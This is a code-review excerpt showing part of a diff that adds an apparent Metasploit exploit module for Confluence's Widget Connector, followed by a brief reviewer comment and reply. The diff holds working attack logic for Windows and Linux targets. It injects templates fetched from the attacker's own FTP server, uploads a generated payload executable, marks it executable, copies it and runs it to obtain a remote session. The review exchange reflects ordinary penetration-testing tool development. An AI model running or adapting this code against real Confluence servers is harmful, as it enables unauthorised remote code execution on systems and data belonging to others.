modules/exploits/multi/http/confluence_widget_connector.rb

```diff
@@ -0,0 +1,494 @@
+  #
+  # @return [void]
+  def exploit_as_windows()
+    tmp_path = get_tmp_path
+
+    if tmp_path.blank?
+      fail_with(Failure::Unknown, 'Unable to get the temp path.')
+    end
+
+    @b64      = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
+    @fname    = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+    new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+    @fname.gsub!(/Program Files/, 'PROGRA~1')
+    new_fname.gsub!(/Program Files/, 'PROGRA~1')
+    register_files_for_cleanup(@fname, new_fname)
+
+    print_status("Attempting to upload #{@fname}")
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+    print_status("Attempting to copy payload to #{new_fname}")
+    get_dup_file_code(@fname, new_fname)
+
+    print_status("Attempting to execute #{new_fname}")
+    @command = new_fname
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+  end
+
+
+  # Exploits the target in Linux platform.
+  #
+  # @return [void]
+  def exploit_as_linux()
+    tmp_path = get_tmp_path
+
+    if tmp_path.blank?
+      fail_with(Failure::Unknown, 'Unable to get the temp path.')
+    end
+
+    @b64      = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
+    @fname    = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))
+    new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))
+    register_files_for_cleanup(@fname, new_fname)
+
+    print_status("Attempting to upload #{@fname}")
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+    @command = "chmod +x #{@fname}"
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+
+    print_status("Attempting to copy payload to #{new_fname}")
+    get_dup_file_code(@fname, new_fname)
+
+    print_status("Attempting to execute #{new_fname}")
+    @command = new_fname
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+  end
+
+  def exploit
+    # Start the FTP service
+    print_status("Starting the FTP server.")
+    start_service
+
+    target_platform = get_target_platform
+    print_status("Target being detected as: #{target_platform}")
+
+    unless target_platform_compat?(target_platform)
+      fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
+    end
+
+    case target.name
+    when /java$/i
+      exploit_as_java()
+    when /windows$/i
+      exploit_as_windows()
+    when /linux$/i
+      exploit_as_linux()
+    end
+
+    wait_for_session
+  end
+
+  def wait_for_session
```

Comment:
Interesting use of this override. Looks similar to `modules/exploits/multi/http/jenkins_xstream_deserialize.rb`?

Reply:
Removed this part.